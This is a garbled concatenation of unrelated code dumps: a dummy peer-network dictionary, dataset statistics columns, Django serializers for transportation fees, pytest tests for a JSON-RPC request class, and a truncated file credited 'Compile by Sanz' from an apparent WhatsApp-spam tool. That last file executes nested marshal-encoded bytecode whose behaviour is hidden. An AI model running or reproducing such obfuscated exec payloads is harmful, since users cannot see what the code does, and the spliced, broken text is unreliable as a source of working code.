"5.1.9.8": [{"ip": "5.2.3.3"}, {"ip": "5.2.2.7"}, {"ip": "5.2.6.7"}, {"ip": "5.2.8.9"}, {"ip": "5.2.8.6"}, {"ip": "5.2.8.5"}, {"ip": "5.2.1.3"}, {"ip": "5.2.0.5"}, {"ip": "5.2.1.6"}, {"ip": "5.2.4.4"}, {"ip": "5.2.4.9"}, {"ip": "5.2.5.2"}, {"ip": "5.2.5.1"}, ],
"5.1.9.5": [{"ip": "5.2.2.6"}, {"ip": "5.2.6.3"}, {"ip": "5.2.2.0"}, {"ip": "5.2.6.9"}, {"ip": "5.2.7.1"}, {"ip": "5.2.2.9"}, {"ip": "5.2.3.5"}, {"ip": "5.2.5.0"}, ],
"5.1.9.4": [{"ip": "5.2.2.5"}, {"ip": "5.2.2.6"}, {"ip": "5.2.2.1"}, {"ip": "5.2.2.3"}, {"ip": "5.2.3.8"}, {"ip": "5.2.4.2"}, {"ip": "5.2.2.8"}, {"ip": "5.2.6.2"}, {"ip": "5.2.8.3"}, {"ip": "5.2.0.6"}, {"ip": "5.2.4.1"}, {"ip": "5.2.1.8"}, ],
"5.1.9.7": [{"ip": "5.2.2.5"}, {"ip": "5.2.3.3"}, {"ip": "5.1.9.3"}, {"ip": "5.2.3.4"}, {"ip": "5.2.3.7"}, {"ip": "5.2.7.5"}, {"ip": "5.2.1.0"}, {"ip": "5.2.4.6"}, {"ip": "5.2.1.6"}, {"ip": "5.2.4.5"}, {"ip": "5.1.9.9"}, {"ip": "5.2.5.6"}, {"ip": "5.2.1.9"}, {"ip": "5.2.5.1"}, ],
"5.1.9.6": [{"ip": "5.2.5.4"}, {"ip": "5.2.0.4"}, {"ip": "5.2.3.2"}, {"ip": "5.2.2.8"}, {"ip": "5.2.5.1"}, ],
"5.1.9.3": [{"ip": "5.2.6.5"}, {"ip": "5.2.6.9"}, {"ip": "5.2.5.8"}, {"ip": "5.2.8.3"}, {"ip": "5.2.0.5"}, {"ip": "5.2.1.6"}, {"ip": "5.1.9.7"}, ],
"5.1.9.2": [{"ip": "5.2.6.0"}, {"ip": "5.2.3.3"}, {"ip": "5.2.4.1"}, {"ip": "5.2.6.7"}, {"ip": "5.2.8.7"}, {"ip": "5.2.4.2"}, {"ip": "5.2.0.5"}, {"ip": "5.2.5.1"}, ],
"5.2.8.9": [{"ip": "5.2.3.1"}, {"ip": "5.2.6.3"}, {"ip": "5.2.6.6"}, {"ip": "5.2.6.9"}, {"ip": "5.2.2.8"}, {"ip": "5.2.0.4"}, {"ip": "5.2.0.2"}, {"ip": "5.2.0.3"}, {"ip": "5.1.9.8"}, ],
"5.2.8.8": [{"ip": "5.2.3.1"}, {"ip": "5.2.7.4"}, {"ip": "5.2.7.3"}, {"ip": "5.2.1.1"}, {"ip": "5.2.4.1"}, {"ip": "5.2.0.2"}, {"ip": "5.2.8.7"}, {"ip": "5.2.5.7"}, {"ip": "5.2.5.2"}, {"ip": "5.2.5.1"}, ],
"5.2.8.1": [{"ip": "5.2.6.0"}, {"ip": "5.2.3.4"}, {"ip": "5.2.6.6"}, {"ip": "5.2.3.9"}, {"ip": "5.2.8.4"}, {"ip": "5.2.1.4"}, {"ip": "5.2.4.4"}, {"ip": "5.2.5.8"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.5"}, ],
"5.2.8.0": [{"ip": "5.2.2.5"}, {"ip": "5.2.6.9"}, {"ip": "5.2.0.1"}, {"ip": "5.2.2.8"}, {"ip": "5.2.2.9"}, {"ip": "5.2.7.3"}, {"ip": "5.2.0.6"}, {"ip": "5.2.0.4"}, {"ip": "5.2.0.5"}, {"ip": "5.2.1.7"}, {"ip": "5.2.4.4"}, {"ip": "5.2.3.8"}, {"ip": "5.2.5.7"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.3"}, {"ip": "5.2.5.2"}, ],
"5.2.8.3": [{"ip": "5.2.9.0"}, {"ip": "5.2.6.4"}, {"ip": "5.2.3.4"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.5"}, {"ip": "5.2.7.0"}, {"ip": "5.2.7.3"}, {"ip": "5.1.9.3"}, {"ip": "5.1.9.4"}, {"ip": "5.2.5.5"}, {"ip": "5.2.5.2"}, ],
"5.2.8.2": [{"ip": "5.2.6.0"}, {"ip": "5.2.3.1"}, {"ip": "5.2.3.4"}, {"ip": "5.2.6.7"}, {"ip": "5.2.6.8"}, {"ip": "5.2.6.9"}, {"ip": "5.2.7.1"}, {"ip": "5.2.7.2"}, {"ip": "5.2.4.1"}, {"ip": "5.2.0.3"}, {"ip": "5.2.0.1"}, ],
"5.2.8.5": [{"ip": "5.2.6.2"}, {"ip": "5.2.6.3"}, {"ip": "5.2.6.5"}, {"ip": "5.2.3.8"}, {"ip": "5.2.7.1"}, {"ip": "5.2.8.3"}, {"ip": "5.2.1.0"}, {"ip": "5.2.1.5"}, {"ip": "5.1.9.8"}, {"ip": "5.2.1.8"}, ],
"5.2.8.4": [{"ip": "5.2.6.0"}, {"ip": "5.2.3.1"}, {"ip": "5.2.2.2"}, {"ip": "5.2.6.8"}, {"ip": "5.2.7.7"}, {"ip": "5.2.1.4"}, {"ip": "5.2.7.3"}, {"ip": "5.2.8.1"}, {"ip": "5.2.4.2"}, {"ip": "5.2.5.9"}, {"ip": "5.2.5.8"}, {"ip": "5.1.9.9"}, {"ip": "5.2.4.9"}, {"ip": "5.2.5.2"}, ],
"5.2.8.7": [{"ip": "5.2.2.4"}, {"ip": "5.2.6.1"}, {"ip": "5.2.8.8"}, {"ip": "5.2.6.6"}, {"ip": "5.2.6.7"}, {"ip": "5.2.6.9"}, {"ip": "5.2.8.3"}, {"ip": "5.2.7.3"}, {"ip": "5.2.0.7"}, {"ip": "5.2.4.0"}, {"ip": "5.2.4.1"}, {"ip": "5.2.0.2"}, {"ip": "5.2.1.4"}, {"ip": "5.1.9.2"}, {"ip": "5.2.5.6"}, ],
"5.2.8.6": [{"ip": "5.2.6.2"}, {"ip": "5.2.7.8"}, {"ip": "5.2.7.7"}, {"ip": "5.2.5.7"}, {"ip": "5.2.2.9"}, {"ip": "5.2.1.2"}, {"ip": "5.2.1.6"}, {"ip": "5.2.4.8"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.5"}, {"ip": "5.2.1.9"}, ],
"5.2.0.1": [{"ip": "5.2.3.3"}, {"ip": "5.2.2.0"}, {"ip": "5.2.2.1"}, {"ip": "5.2.0.7"}, {"ip": "5.2.7.4"}, {"ip": "5.2.9.1"}, {"ip": "5.2.8.2"}, {"ip": "5.2.8.0"}, {"ip": "5.2.7.1"}, {"ip": "5.2.4.3"}, {"ip": "5.2.1.0"}, ],
"5.2.0.0": [{"ip": "5.2.0.6"}, {"ip": "5.2.6.5"}, {"ip": "5.2.7.7"}, {"ip": "5.2.7.0"}, {"ip": "5.2.4.2"}, {"ip": "5.2.1.6"}, {"ip": "5.2.5.4"}, ],
"5.2.0.3": [{"ip": "5.2.6.2"}, {"ip": "5.2.3.5"}, {"ip": "5.2.1.5"}, {"ip": "5.2.3.7"}, {"ip": "5.2.8.9"}, {"ip": "5.2.7.7"}, {"ip": "5.2.8.2"}, {"ip": "5.2.1.3"}, {"ip": "5.2.4.7"}, {"ip": "5.2.5.9"}, ],
"5.2.0.2": [{"ip": "5.2.2.4"}, {"ip": "5.2.1.8"}, {"ip": "5.2.2.2"}, {"ip": "5.2.8.8"}, {"ip": "5.2.8.9"}, {"ip": "5.2.6.9"}, {"ip": "5.2.2.8"}, {"ip": "5.2.1.3"}, {"ip": "5.2.1.2"}, {"ip": "5.2.4.0"}, {"ip": "5.2.1.5"}, {"ip": "5.2.8.7"}, {"ip": "5.2.5.7"}, {"ip": "5.2.4.9"}, ],
"5.2.0.5": [{"ip": "5.2.3.0"}, {"ip": "5.2.3.2"}, {"ip": "5.2.2.0"}, {"ip": "5.2.2.5"}, {"ip": "5.2.7.4"}, {"ip": "5.2.7.7"}, {"ip": "5.2.9.0"}, {"ip": "5.2.8.0"}, {"ip": "5.2.4.3"}, {"ip": "5.1.9.2"}, {"ip": "5.1.9.3"}, {"ip": "5.2.5.8"}, {"ip": "5.1.9.8"}, {"ip": "5.2.1.9"}, ],
"5.2.0.4": [{"ip": "5.2.2.4"}, {"ip": "5.2.1.3"}, {"ip": "5.2.2.6"}, {"ip": "5.2.8.9"}, {"ip": "5.2.7.5"}, {"ip": "5.2.8.0"}, {"ip": "5.2.0.6"}, {"ip": "5.2.1.6"}, {"ip": "5.1.9.6"}, {"ip": "5.1.9.9"}, ],
"5.2.0.7": [{"ip": "5.2.2.4"}, {"ip": "5.2.6.3"}, {"ip": "5.2.7.5"}, {"ip": "5.2.8.7"}, {"ip": "5.2.4.5"}, {"ip": "5.2.2.9"}, {"ip": "5.2.4.3"}, {"ip": "5.2.4.7"}, {"ip": "5.2.0.1"}, {"ip": "5.2.6.8"}, ],
"5.2.0.6": [{"ip": "5.2.2.4"}, {"ip": "5.2.3.3"}, {"ip": "5.2.6.5"}, {"ip": "5.2.0.0"}, {"ip": "5.2.6.8"}, {"ip": "5.2.8.0"}, {"ip": "5.2.0.4"}, {"ip": "5.2.4.1"}, {"ip": "5.1.9.4"}, {"ip": "5.2.5.9"}, {"ip": "5.2.5.7"}, ],
"5.2.0.9": [{"ip": "5.2.3.0"}, {"ip": "5.2.6.5"}, {"ip": "5.2.2.2"}, {"ip": "5.2.6.7"}, {"ip": "5.2.2.3"}, {"ip": "5.2.4.2"}, {"ip": "5.2.4.0"}, {"ip": "5.2.1.5"}, {"ip": "5.2.5.5"}, ],
"5.2.0.8": [{"ip": "5.2.6.1"}, {"ip": "5.2.2.6"}, {"ip": "5.2.6.3"}, {"ip": "5.2.2.2"}, {"ip": "5.2.7.5"}, {"ip": "5.2.3.8"}, {"ip": "5.2.9.0"}, {"ip": "5.2.1.6"}, {"ip": "5.1.9.9"}, ],
}
DUMMY_SEEDS_B = {
1: "5.2.4.0",
2: "5.1.9.6",
3: "5.2.0.4",
4: "5.2.3.0",
5: "5.2.7.8",
6: "5.2.2.0",
7: "5.2.8.4",
8: "5.2.0.8",
}
DUMMY_NETWORK = DUMMY_NETWORK_B
DUMMY_SEEDS = DUMMY_SEEDS_B
def dummy_getaddr(node):
"""
Returns adjacent nodes based on the dummy network.
"""
time.sleep(0.2)
return DUMMY_NETWORK.get(node, [])
| 111.839286
| 341
| 0.334624
| 6,150
| 25,052
| 1.359837
| 0.026504
| 0.25278
| 0.451513
| 0.070549
| 0.832835
| 0.81454
| 0.805453
| 0.776157
| 0.70501
| 0.441349
| 0
| 0.235689
| 0.149968
| 25,052
| 223
| 342
| 112.340807
| 0.157032
| 0.050056
| 0
| 0
| 0
| 0
| 0.458682
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006667
| false
| 0
| 0.006667
| 0
| 0.02
| 0
| 0
| 0
| 1
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
8ca54f9c75a94b2bdc1ea7eaa1d7325fce4caefd
| 3,729
|
py
|
Python
|
payment/serializers.py
|
ashrafali46/GreaterWMS
|
1aed14a8c26c8ac4571db5e6b07ab7e4fa3c7c72
|
[
"Apache-2.0"
] | 2
|
2021-11-09T10:29:44.000Z
|
2021-11-15T08:03:40.000Z
|
payment/serializers.py
|
ashrafali46/GreaterWMS
|
1aed14a8c26c8ac4571db5e6b07ab7e4fa3c7c72
|
[
"Apache-2.0"
] | null | null | null |
payment/serializers.py
|
ashrafali46/GreaterWMS
|
1aed14a8c26c8ac4571db5e6b07ab7e4fa3c7c72
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework import serializers
from .models import TransportationFeeListModel
from utils import datasolve
class PaymentGetSerializer(serializers.ModelSerializer):
send_city = serializers.CharField(read_only=True, required=False)
receiver_city = serializers.CharField(read_only=True, required=False)
weight_fee = serializers.FloatField(read_only=True, required=False)
volume_fee = serializers.FloatField(read_only=True, required=False)
transportation_supplier = serializers.CharField(read_only=True, required=False)
creater = serializers.CharField(read_only=True, required=False)
create_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
update_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
class Meta:
model = TransportationFeeListModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id']
class PaymentPostSerializer(serializers.ModelSerializer):
openid = serializers.CharField(read_only=False, required=False, validators=[datasolve.openid_validate])
send_city = serializers.CharField(read_only=False, required=True, validators=[datasolve.data_validate])
receiver_city = serializers.CharField(read_only=False, required=True, validators=[datasolve.data_validate])
weight_fee = serializers.FloatField(read_only=False, required=True, validators=[datasolve.data_validate])
volume_fee = serializers.FloatField(read_only=False, required=True, validators=[datasolve.data_validate])
transportation_supplier = serializers.CharField(read_only=False, required=True, validators=[datasolve.data_validate])
creater = serializers.CharField(read_only=False, required=True, validators=[datasolve.data_validate])
class Meta:
model = TransportationFeeListModel
exclude = ['is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class PaymentUpdateSerializer(serializers.ModelSerializer):
send_city = serializers.CharField(read_only=False, required=True, validators=[datasolve.data_validate])
receiver_city = serializers.CharField(read_only=False, required=True, validators=[datasolve.data_validate])
weight_fee = serializers.FloatField(read_only=False, required=True, validators=[datasolve.data_validate])
volume_fee = serializers.FloatField(read_only=False, required=True, validators=[datasolve.data_validate])
transportation_supplier = serializers.CharField(read_only=False, required=True, validators=[datasolve.data_validate])
creater = serializers.CharField(read_only=False, required=True, validators=[datasolve.data_validate])
class Meta:
model = TransportationFeeListModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class PaymentPartialUpdateSerializer(serializers.ModelSerializer):
send_city = serializers.CharField(read_only=False, required=False, validators=[datasolve.data_validate])
receiver_city = serializers.CharField(read_only=False, required=False, validators=[datasolve.data_validate])
weight_fee = serializers.FloatField(read_only=False, required=False, validators=[datasolve.data_validate])
volume_fee = serializers.FloatField(read_only=False, required=False, validators=[datasolve.data_validate])
transportation_supplier = serializers.CharField(read_only=False, required=False, validators=[datasolve.data_validate])
creater = serializers.CharField(read_only=False, required=False, validators=[datasolve.data_validate])
class Meta:
model = TransportationFeeListModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
| 67.8
| 122
| 0.77447
| 412
| 3,729
| 6.798544
| 0.126214
| 0.08854
| 0.088183
| 0.142449
| 0.906462
| 0.903963
| 0.888968
| 0.856837
| 0.776151
| 0.752945
| 0
| 0
| 0.116385
| 3,729
| 54
| 123
| 69.055556
| 0.850076
| 0
| 0
| 0.52
| 0
| 0
| 0.043443
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.06
| 0
| 0.76
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
0fa0a56ae97412f5daf75ef4abf2617cd0cd9210
| 9,101
|
py
|
Python
|
tests/test_jussi_request.py
|
bnchdrff/jussi
|
79d8decde323b84cdd8331e5cbb490021ea78cee
|
[
"MIT"
] | null | null | null |
tests/test_jussi_request.py
|
bnchdrff/jussi
|
79d8decde323b84cdd8331e5cbb490021ea78cee
|
[
"MIT"
] | null | null | null |
tests/test_jussi_request.py
|
bnchdrff/jussi
|
79d8decde323b84cdd8331e5cbb490021ea78cee
|
[
"MIT"
] | 1
|
2018-03-14T10:36:48.000Z
|
2018-03-14T10:36:48.000Z
|
# -*- coding: utf-8 -*-
from collections import OrderedDict
import os
from copy import deepcopy
import pytest
import ujson
import json
from .conftest import TEST_UPSTREAM_CONFIG
from jussi.errors import InvalidNamespaceError
from jussi.errors import InvalidNamespaceAPIError
from jussi.urn import URN
from jussi.upstream import _Upstreams
from jussi.request import JussiJSONRPCRequest
from .conftest import TEST_UPSTREAM_CONFIG
from .conftest import AttrDict
def test_request_id(urn_test_request_dicts):
jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
assert jussi_request.id == jsonrpc_request.get('id')
def test_request_jsonrpc(urn_test_request_dicts):
jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
assert jussi_request.jsonrpc == '2.0'
def test_request_method(full_urn_test_request_dicts):
jsonrpc_request, urn_parsed, urn, url, ttl, timeout = full_urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
assert jussi_request.method == jsonrpc_request['method']
def test_request_params(full_urn_test_request_dicts):
jsonrpc_request, urn_parsed, urn, url, ttl, timeout = full_urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
assert jussi_request.params == jsonrpc_request.get('params', False)
def test_request_urn(urn_test_request_dicts):
jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
assert jussi_request.urn == urn
def test_request_upstream(urn_test_request_dicts):
jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
os.environ['JUSSI_ACCOUNT_TRANSFER_STEEMD_URL'] = 'account_transfer_url'
assert jussi_request.upstream.url == url
def test_request_urn(urn_test_request_dicts):
jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
assert jussi_request.batch_index == 0
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 1, jsonrpc_request)
assert jussi_request.batch_index == 1
def test_request_to_dict(urn_test_request_dicts):
jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
assert jussi_request.to_dict() == jsonrpc_request
def test_request_to_json(urn_test_request_dicts):
jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
assert ujson.loads(jussi_request.json()) == jussi_request.to_dict()
def test_upstream_id(urn_test_request_dicts):
jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
assert jussi_request.upstream_id == 123456789012345
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 1, jsonrpc_request)
assert jussi_request.upstream_id == 123456789012346
def test_upstream_headers(urn_test_request_dicts):
jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
assert jussi_request.upstream_headers == {
'x-jussi-request-id': '123456789012345'}
dummy_request.headers['x-amzn-trace-id'] = '1'
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
assert jussi_request.upstream_headers == {
'x-jussi-request-id': '123456789012345',
'x-amzn-trace-id': '1'
}
def upstream_request(urn_test_request_dicts):
jsonrpc_request, urn, url, ttl, timeout = urn_test_request_dicts
dummy_request = AttrDict()
dummy_request.headers = dict()
dummy_request['jussi_request_id'] = '123456789012345'
dummy_request.app = AttrDict()
dummy_request.app.config = AttrDict()
dummy_request.app.config.upstreams = _Upstreams(TEST_UPSTREAM_CONFIG,
validate=False)
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 0, jsonrpc_request)
cpy = deepcopy(jussi_request)
cpy['id'] = 123456789012345
assert jussi_request.to_upstream_request(as_json=False) == cpy
assert jussi_request.to_upstream_request() == ujson.dumps(cpy,
ensure_ascii=False)
cpy = deepcopy(jussi_request)
cpy['id'] = 123456789012346
jussi_request = JussiJSONRPCRequest.from_request(dummy_request, 1, cpy)
assert jussi_request.to_upstream_request(as_json=False) == cpy
assert jussi_request.to_upstream_request() == ujson.dumps(cpy,
ensure_ascii=False)
def test_log_extra():
# TODO
pass
def test_request_hash():
# TODO
pass
| 42.929245
| 87
| 0.707395
| 1,035
| 9,101
| 5.861836
| 0.068599
| 0.176034
| 0.118675
| 0.075161
| 0.85792
| 0.853634
| 0.842426
| 0.823471
| 0.814406
| 0.814406
| 0
| 0.040717
| 0.209318
| 9,101
| 211
| 88
| 43.132701
| 0.80239
| 0.003406
| 0
| 0.738372
| 0
| 0
| 0.060004
| 0.00364
| 0
| 0
| 0
| 0.004739
| 0.104651
| 1
| 0.081395
| false
| 0.011628
| 0.081395
| 0
| 0.162791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0fc45380a2c68776c495ca1b84887f05d96c3305
| 185,747
|
py
|
Python
|
spam-wa/wa_dis.py
|
Alpha-Demon404/RE-14
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 39
|
2020-02-26T09:44:36.000Z
|
2022-03-23T00:18:25.000Z
|
spam-wa/wa_dis.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 15
|
2020-05-14T10:07:26.000Z
|
2022-01-06T02:55:32.000Z
|
spam-wa/wa_dis.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 41
|
2020-03-16T22:36:38.000Z
|
2022-03-17T14:47:19.000Z
|
# Compile by Sanz
# Youtube : SANZ SOEKAMTI
# Github : https://github.com/B4N954N2-ID
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns8\xfe\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb2\xfd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns,\xfd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa6\xfc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns \xfc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x9a\xfb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x14\xfb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x8e\xfa\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x08\xfa\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x82\xf9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xfc\xf8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsv\xf8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x0